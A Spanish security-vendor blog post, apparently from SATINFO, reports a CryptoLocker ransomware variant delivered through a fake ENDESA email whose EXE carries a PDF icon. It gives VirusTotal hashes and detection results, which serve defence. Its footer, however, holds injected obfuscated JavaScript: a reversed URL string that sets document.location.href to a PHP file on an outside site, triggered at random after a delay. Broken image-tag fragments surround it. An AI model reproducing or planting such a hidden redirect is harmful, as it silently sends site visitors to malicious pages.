CAMBIOS EN LOS FICHEROS INSTALADOS POR EL RANSOMWARE CRYPTOLOCKER DEL FALSO MAIL DE ENDESA
Una novedad que hemos visto en algunos de los nuevos ficheros creados por el dichoso Cryptolocker que llega por el falso mail de ENDESA es que el EXE generado por el JS que contiene el ZIP, ofrece un icono como si fuera de un PDF de Adobe:
tolockers del falso mail de ENDESA” width=”245″ height=”77″ />
ICONO DE NUEVOS CRYPTOLOCKERS DEL FALSO MAIL DE ENDESA.JPG
Ello puede despistar aun mas al usuario, confundiendole al ocultar Windows por defecto las extensiones, y creer que el fichero en cuestión en un PDF…
El preanalisis de virustotal de esta nueva variante, que pasamos a controlar con el ELISTARA 34.67 de hoy, ofrece el siguiente informe:
MD5 67a775879d3664456cb6a5026c518ca0
SHA1 b154e7739469d5240c4ec31735e07458470874ef
Tamaño del fichero 394.8 KB ( 404322 bytes )
SHA256: 95612238a05988eecd7c1df6969b22ecf8e4a1339a93bbca383f5f14e5d6a7ac
Nombre: yniqelam.exe
Detecciones: 9 / 57
Fecha de análisis: 2016-06-01 08:26:13 UTC ( hace 0 minutos )
0 1
Antivirus Resultado Actualización
AVware Trojan.Win32.Injector.cdgy (v) 20160601
BitDefender Gen:Variant.Mikey.38732 20160601
Emsisoft Gen:Variant.Mikey.38732 (B) 20160601
GData Gen:Variant.Mikey.38732 20160601
Kaspersky UDS:DangerousObject.Multi.Generic 20160601
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.fc 20160601
Qihoo-360 HEUR/QVM07.1.Malware.Gen 20160601
Rising Malware.Generic!Jkg5XkxaelP@5 (Thunder) 20160601
VIPRE Trojan.Win32.Injector.cdgy (v) 20160601
Como se ve, aun son pocos los AV que lo detectan actualmente (solo 9 de 57), dado que están creando continuamente nuevas variantes y ello implica irlas conociendo y controlando a medida que aparecen, y en ello estamos…
Ofrecemos esta información puntual de una de las variantes, por la singularidad del icono, pero vamos analizando y pasando a controlar todos los que aun no se conocven actualmente.
Dicha versión del ELISTARA 34.67 con la que controlaremos todos los nuevos de hoy, estará disponible en nuestra web a partir de las 18 h CEST de hoy.
saludos
ms, 1-6-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolockers-del-falso-mail-de-ENDESA.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.